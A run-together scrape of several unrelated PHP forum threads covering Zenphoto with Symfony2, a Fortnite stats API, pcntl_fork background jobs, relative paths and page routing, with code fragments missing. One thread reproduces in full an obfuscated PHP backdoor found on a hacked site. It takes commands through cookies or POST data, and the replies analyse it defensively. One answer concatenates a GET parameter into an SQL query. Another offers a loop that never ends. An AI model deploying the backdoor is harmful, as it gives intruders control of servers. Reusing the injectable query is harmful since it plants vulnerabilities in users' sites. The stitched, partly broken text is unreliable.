I want to use zenphoto with my symfony2 website. I would do so by making calls to zenphoto to retrieve images. Here's a non-symfony2 coding example from another one of my sites that it would use as a basis:
define('WEBPATH', 'zenphoto');
require_once(WEBPATH . "/zp-core/template-functions.php");
$currentPage = $_SERVER["PHP_SELF"];
$imageNum = 0;
if (isset($_GET['imageNum']))
$imageNum = $_GET['imageNum'];
$gallery = new Gallery();
$numAlbums = $gallery->getNumAlbums();
for ($i = 0 ; $i < $numAlbums; $i++)
$album = $gallery->getAlbum($i);
$title = $album->getTitle();
if ($title == "Overview") break;
$totalImages = $album->getNumImages() - 1;
$image = $album->getImage($imageNum);
$sizedImage = $image->getSizedImage(600);
There's more code buried in the HTML. All the code would end up in a controller. My question is how to best integrate zenphoto if at all. I could just install the code independent of the framework, but I imagine there's a better way.
There's a whole front end for uploading and managing images as well as admin functions. These web pages would be independent of Symfony as it doesn't seem possible to integrate them.
I went with the simple approach of just including the libraries into the controller.
define('SERVERPATH',$_SERVER['DOCUMENT_ROOT'] . "/zenphoto");
The zenphoto directory is at the same level as my symfony directory. This worked find, but when I tried a simple call to the API, it failed in the zenphoto code. When I asked about the problem on the zenphoto forum, I was told I would have to do a lot of manual set up to make it work. At this point, I gave up and went with placing my images on flickr and using their API.
I want to put my fortnite stats on my website HTML/CSS. I find this.
But I don't know php very good, so I need your help. Must I delete this: 'your_api_key' and put : your_api_key without the ' ' ?
And lines like this:
$this->auth = new Fortnite_Auth($this);
$this->challenges = new Fortnite_Challenges($this);
$this->leaderboard = new Fortnite_Leaderboard($this);
$this->items = new Fortnite_Items($this);
$this->news = new Fortnite_News($this);
$this->patchnotes = new Fortnite_PatchNotes($this);
$this->pve = new Fortnite_PVE($this);
$this->status = new Fortnite_Status($this);
$this->weapons = new Fortnite_Weapons($this);
$this->user = new Fortnite_User($this)
Must I modify something?
(here are some informations:
-user_id: 501b9f2dfda34249a2749467513172bf
-username: NoMaD_DEEPonion
-platform: pc
-windows: season 5
For all this code, I used xammp server (I hope it's good)
Thank you for your help
You should always quote '' your key/strings. So it would look like:
Please read their documentation. You're supposed to get an API key from them to get started. And you don't have to edit Client.php. You're supposed to include the files instead. Try including Autoloader.php, since it requires the necessary files.
XAMPP is alright for development, but not suitable for production/public. Good luck!
What #sykez wrote.
I personally use https://fortniteapi.com/ to get the data. They also have a sweet POSTMAN page with different requests https://documenter.getpostman.com/view/4499368/RWEjoGqD
At last. I am not really sure that this will be a good project to start learning PHP from. I really suggest that you get to understand the basics of PHP first before you jump into API calls, processing arrays and more.
I am sorry to ask a silly question but I am not able to figure this out. I found a PHP file in my root directory with strange code. I know little bit PHP but this is a very strange code inside the PHP code. I am sure that it is not PHP functions. I don't know what is this code about.
Is my website compromised? Can some tell me that they can do with my website through this code. I am raising this question here because maybe this can help some one to save their websites.
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
$GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]] = $GLOBALS['t7004'][61].$GLOBALS['t7004'][4].$GLOBALS['t7004'][59];
$GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][79];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][53].$GLOBALS['t7004'][59].$GLOBALS['t7004'][92].$GLOBALS['t7004'][55].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][6].$GLOBALS['t7004'][77].$GLOBALS['t7004'][6].$GLOBALS['t7004'][2].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][32].$GLOBALS['t7004'][4].$GLOBALS['t7004'][32].$GLOBALS['t7004'][72].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77];
$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][84].$GLOBALS['t7004'][77].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][6].$GLOBALS['t7004'][56].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][89].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]] = $GLOBALS['t7004'][43].$GLOBALS['t7004'][56].$GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][2].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][74].$GLOBALS['t7004'][62].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62]] = $GLOBALS['t7004'][83].$GLOBALS['t7004'][55].$GLOBALS['t7004'][53].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][6].$GLOBALS['t7004'][53];
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]] = $GLOBALS['t7004'][49].$GLOBALS['t7004'][75].$GLOBALS['t7004'][41].$GLOBALS['t7004'][10].$GLOBALS['t7004'][62].$GLOBALS['t7004'][13];
$GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]] = $GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][71].$GLOBALS['t7004'][13].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55];
$GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] = $_POST;
$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] = $_COOKIE;
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][2].$GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74], NULL);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][92].$GLOBALS['t7004'][58].$GLOBALS['t7004'][74].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][59].$GLOBALS['t7004'][59].$GLOBALS['t7004'][58].$GLOBALS['t7004'][59].$GLOBALS['t7004'][83], 0);
#$GLOBALS[$GLOBALS['t7004'][89].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][56].$GLOBALS['t7004'][61].$GLOBALS['t7004'][56].$GLOBALS['t7004'][62]]($GLOBALS['t7004'][52].$GLOBALS['t7004'][56].$GLOBALS['t7004'][64].$GLOBALS['t7004'][2].$GLOBALS['t7004'][55].$GLOBALS['t7004'][64].$GLOBALS['t7004'][55].$GLOBALS['t7004'][61].$GLOBALS['t7004'][84].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][58].$GLOBALS['t7004'][77].$GLOBALS['t7004'][2].$GLOBALS['t7004'][53].$GLOBALS['t7004'][6].$GLOBALS['t7004'][52].$GLOBALS['t7004'][55], 0);
$rcc6ec6 = NULL;
$e6ca3e0 = NULL;
$GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][29].$GLOBALS['t7004'][10].$GLOBALS['t7004'][90]] = $GLOBALS['t7004'][10].$GLOBALS['t7004'][85].$GLOBALS['t7004'][62].$GLOBALS['t7004'][61].$GLOBALS['t7004'][10].$GLOBALS['t7004'][56].$GLOBALS['t7004'][85].$GLOBALS['t7004'][55].$GLOBALS['t7004'][0].$GLOBALS['t7004'][71].$GLOBALS['t7004'][61].$GLOBALS['t7004'][55].$GLOBALS['t7004'][13].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][85].$GLOBALS['t7004'][0].$GLOBALS['t7004'][90].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][75].$GLOBALS['t7004'][0].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][71].$GLOBALS['t7004'][62].$GLOBALS['t7004'][90].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][85].$GLOBALS['t7004'][71].$GLOBALS['t7004'][55].$GLOBALS['t7004'][29];
global $c6278d728;
function f7684f5ee($rcc6ec6, $r8c6)
$ua52559 = "";
for ($o4b1=0; $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6);)
for ($b1ad67b=0; $b1ad67b<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($r8c6) && $o4b1<$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][47].$GLOBALS['t7004'][56].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43].$GLOBALS['t7004'][11]]($rcc6ec6); $b1ad67b++, $o4b1++)
$ua52559 .= $GLOBALS[$GLOBALS['t7004'][79].$GLOBALS['t7004'][75].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62].$GLOBALS['t7004'][43]]($GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($rcc6ec6[$o4b1]) ^ $GLOBALS[$GLOBALS['t7004'][49].$GLOBALS['t7004'][11].$GLOBALS['t7004'][11].$GLOBALS['t7004'][90].$GLOBALS['t7004'][55].$GLOBALS['t7004'][62]]($r8c6[$b1ad67b]));
return $ua52559;
function y10245($rcc6ec6, $r8c6)
global $c6278d728;
return $GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($GLOBALS[$GLOBALS['t7004'][56].$GLOBALS['t7004'][71].$GLOBALS['t7004'][29].$GLOBALS['t7004'][47].$GLOBALS['t7004'][13]]($rcc6ec6, $c6278d728), $r8c6);
foreach ($GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][10].$GLOBALS['t7004'][29].$GLOBALS['t7004'][56].$GLOBALS['t7004'][29].$GLOBALS['t7004'][29].$GLOBALS['t7004'][85].$GLOBALS['t7004'][10]] as $r8c6=>$ob6137983)
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
if (!$rcc6ec6)
foreach ($GLOBALS[$GLOBALS['t7004'][4].$GLOBALS['t7004'][75].$GLOBALS['t7004'][79].$GLOBALS['t7004'][79].$GLOBALS['t7004'][85]] as $r8c6=>$ob6137983)
$rcc6ec6 = $ob6137983;
$e6ca3e0 = $r8c6;
$rcc6ec6 = #$GLOBALS[$GLOBALS['t7004'][84].$GLOBALS['t7004'][43].$GLOBALS['t7004'][55].$GLOBALS['t7004'][55].$GLOBALS['t7004'][90].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][61].$GLOBALS['t7004'][85].$GLOBALS['t7004'][11].$GLOBALS['t7004'][56].$GLOBALS['t7004'][13].$GLOBALS['t7004'][47].$GLOBALS['t7004'][29].$GLOBALS['t7004'][61]]($GLOBALS[$GLOBALS['t7004'][58].$GLOBALS['t7004'][79].$GLOBALS['t7004'][62].$GLOBALS['t7004'][56]]($rcc6ec6), $e6ca3e0));
if (isset($rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]]) && $c6278d728==$rcc6ec6[$GLOBALS['t7004'][56].$GLOBALS['t7004'][95]])
if ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][6])
$o4b1 = Array(
$GLOBALS['t7004'][32].$GLOBALS['t7004'][72] => #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][13].$GLOBALS['t7004'][75].$GLOBALS['t7004'][90].$GLOBALS['t7004'][90]](),
$GLOBALS['t7004'][83].$GLOBALS['t7004'][72] => $GLOBALS['t7004'][75].$GLOBALS['t7004'][9].$GLOBALS['t7004'][41].$GLOBALS['t7004'][0].$GLOBALS['t7004'][75],
echo #$GLOBALS[$GLOBALS['t7004'][65].$GLOBALS['t7004'][90].$GLOBALS['t7004'][62].$GLOBALS['t7004'][41].$GLOBALS['t7004'][71].$GLOBALS['t7004'][10]]($o4b1);
elseif ($rcc6ec6[$GLOBALS['t7004'][56]] == $GLOBALS['t7004'][55])
(I'm not able yet to answer)
I had similar code on a customer website with a joomla install, several times.
If your webhost hasn't a code-checker were it blacklists hacked files, you should have to search the whole public_html directory.
I had one recent case where the code included several new files in a wordpress install, across different folders and some hidden with even meaningful names. I had to go thorugh every folder and check files with the same date (the hacking date - last modification) and go through each one to check if it was completely malicious code or just partly.
But usually I radically delete sections and files with encrypted code, they generally are hacked files...
The code you have posted is obfuscated PHP. The string at the beginning with all the \x 's in it is a hex representation of a string.
There is a neat site named "DDecode" I found here: Hex Decoder which will attempt to do exactly what it says.
Plugging your code into that site we can see that the first part:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['t7004'] = "\x2d\x23\x5f\x5d\x68\x45\x69\x3a\xa\x2e\x32\x39\x60\x35\x44\x9\x59\x6a\x7b\x50\xd\x7d\x57\x2b\x29\x53\x20\x7e\x56\x37\x48\x46\x70\x7c\x49\x4e\x52\x25\x26\x42\x5a\x30\x2a\x62\x51\x2f\x3c\x33\x4d\x79\x54\x3b\x6d\x74\x22\x65\x61\x71\x6f\x72\x5e\x63\x34\x5b\x78\x77\x4f\x58\x43\x47\x40\x66\x76\x41\x67\x31\x3d\x6e\x4c\x64\x55\x3f\x24\x73\x75\x36\x28\x3e\x21\x7a\x38\x2c\x6c\x4b\x27\x6b\x4a\x5c";
<?php ${"GLOBALS"}['t7004'] = "-#_]hEi:\xa.29`5D\x9Yj{P\xd}W+)S~V7HFp|INR%&BZ0*bQ/<3MyT;mt"eaqor^c4[xwOXCG#fvAg1=nLdU?$su6(>!z8,lK'kJ\";
I am not super familiar with PHP myself, however we can see that a variable is being set here to a long, apparently random string. From there we can look at the rest of the code and see that it is almost entirely a series of references back to this initial string. In this way the attacker has hidden what their code is doing by making it appear nonsensical, which is the point of obfuscation of course.
You could take the time to dereference all of those calls if you wanted to try and get a better idea of what the code is doing. Also there may be some security researchers who would be interested in seeing this code and could possibly give you more insight into what it is doing.
As for the state of your website - if you didn't do this then yes, the chances are highly likely it has been compromised and you should at a minimum, as the comments suggested:
roll back to a clean, known good version
update your host with any applicable patches
INFORM YOUR USERS! Especially since you are unsure what this code does it is important to let your users know that your site has potentially been compromised so they can take the appropriate actions.
I have a website on an Ubuntu LAMP Server - that has a form which gets variables and then they get submitted to a function that handles them. The function calls other functions in the controller that "explodes" the variables, order them in an array and run a "for" loop on each variable, gets new data from slow APIs, and inserts the new data to the relevant tables in the database.
Whenever I submit a form, the whole website gets stuck (only for my IP, on other desktops the website continue working regularly), and I get redirected until I get to the requested "redirect("new/url);".
I have been researching this issue for a while and found this post as an example:
Continue PHP execution after sending HTTP response
After studding how this works in the server side, which is explained really good in this video: https://www.youtube.com/watch?v=xVSPv-9x3gk
I wanted to start learning how to write it's syntax and found out that this only work on CLI and not from APACHE, but I wasn't sure.
I opened this post a few days ago: PHP+fork(): How to run a fork in a PHP code
and after getting everything working from the server side, installing fork and figuring out the differences of the php.ini files in a server (I edited the apache2 php.ini, don't get mistaked), I stopped getting the errors I used to get for the "fork", but the processes don't run in the background, and I didn't get redirected.
This is the controller after adding fork:
// Registers a new keyword for prod to the DB.
public function add_keyword() {
$keyword_p = $this->input->post('key_word');
$prod = $this->input->post('prod_name');
$prod = $this->kas_model->search_prod_name($prod);
$prod = $prod[0]->prod_id;
$country = $this->input->post('key_country');
$keyword = explode(", ", $keyword_p);
$keyword_count = count($keyword);
echo "the keyword count: $keyword_count";
for ($i=0; $i < $keyword_count ; $i++) {
// create your next fork
$pid = pcntl_fork();
//*** get new vars from $keyword_count
//*** run API functions to get new data_arrays
//*** inserts new data for each $keyword_count to the DB
print "In child $i\n";
// end child
// we are the parent (main), check child's (optional)
while(pcntl_waitpid(0, $status) != -1){
$status = pcntl_wexitstatus($status);
echo "Child $status completed\n";
// your other main code: Redirect to main page.
And this is the controller without the fork:
// Registers a new keyword for prod to the DB.
public function add_keyword() {
$keyword_p = $this->input->post('key_word');
$prod = $this->input->post('prod_name');
$prod = $this->kas_model->search_prod_name($prod);
$prod = $prod[0]->prod_id;
$country = $this->input->post('key_country');
$keyword = explode(", ", $keyword_p);
$keyword_count = count($keyword);
echo "the keyword count: $keyword_count";
// problematic part that needs forking
for ($i=0; $i < $keyword_count ; $i++) {
// get new vars from $keyword_count
// run API functions to get new data_arrays
// inserts new data for each $keyword_count to the DB
// Redirect to main page.
The for ($i=0; $i < $keyword_count ; $i++) { is the part that I want to get running in the background because it's taking too much time.
So now:
How can I get this working the way I explained? Because from what I see, fork isn't what I'm looking for, or I might be doing this wrong.
I will be happy to learn new techniques, so I will be happy to get suggestions about how I can do this in different ways. I am a self learner, and I found out the great advantages of Node.js for exmaple, which could have worked perfectly in this case if I would have learnt it. I will consider to learn working with Node.js in the future. sending server requests and getting back responses is awesome ;).
***** If there is a need to add more information about something, please tell me in comments and I will add more information to my post if you think it's relevant and I missed it.
What you're really after is a queue or a job system. There's one script running all the time, waiting for something to do. Once your original PHP script runs, it just adds a job to the list, and it can continue it's process as normal.
There's a few implementations of this - take a look at something like https://laravel.com/docs/5.1/queues
Thanks in advance for the help that will be received!
I used to use a code I made when I first started, due to not being able to find a snippet that does what I want. (Maybe to not knowing the terminology) I'm sure there's a more simple way, which is why I'm asking advice.
The pages that will use this template are temporarily hosted in a subdirectory of another website, and using "/" to start at the root of the page isn't an option I want to go with, due to wanting to effortlessly drop the website on a different hosting server and add a domain name to the pages so the path from root (ex. "/temp-dir/site/images/image.jpg") will need updated, whereas, using a previous directory (ex. "../../../images/image.jpg") will work from existing site and new location upon move.
What I am trying to achieve is applying the proper amount of "../" before the file names in a header template using a method like:
<link href="<?php if(isset($pDepth)){ echo $prev; }?>style.css" />
Where $prev will equal previous directory code ranging from "../" to "../../../../" depending on the variable $pDepth on each web page. For example:
if($pDepth == 3){the output of $prev will equal "../../../"}
I seen where the output can change using ++, but you can't add strings can you? I'm thinking something like:
if($pDepth == 4){
$i = 0;
while($i != $pDepth){
// help needed here
// add "../" until $prev = "../../../../"
I'm still learning to write code, and would appreciate any help. Thanks Again!
$prev = str_repeat('../', $pDepth);
$pDepth = $pDepth . "../";
Should work just fine.
To concatenate strings in PHP, you use the . operator.
Try this:
if($pDepth == 4){
$i = 0;
while($i != $pDepth){
$prev .= '../';
I want to control the access in php website.
I have a solution right now with switch case.
$obj = $_GET['obj'];
switch ($obj)
case a:
include ('a.php');
include ('f.php');
But when i have so many pages, it becomes difficult to manage them. Do you have better solutions?
Right now, i develop the application using php4. And i want to use php5. Do you have any suggestions when i develop it using php5?
$obj = $_GET['obj'];
$validArray = array('a','b','c','d','e');
if (in_array($obj,$validArray)) {
include ($obj.'.php');
} else {
include ('f.php');
The more pages you have the harder it will be to control this.
Your best off using a framework of some sort, my personal preference is CodeIgniter.
why not just address a page itself?
first page
another page
I am not saying that this is the best solution, but years ago I used to have a website which used a database to manage the key, the page to be included, and some informations like additional css for instance.
So the code was something like:
$page = htmlspecialchars($_GET['page']);
$stuffs = $db->query('select include,css from pages where pageid = "' . $page . '" LIMIT 1');
So when we needed to add a page, we just created a new field in the database. That let us close a part of the website too: we could have a "available = {0,1}" field, and if zero, display a static page saying that this page was under maintenance.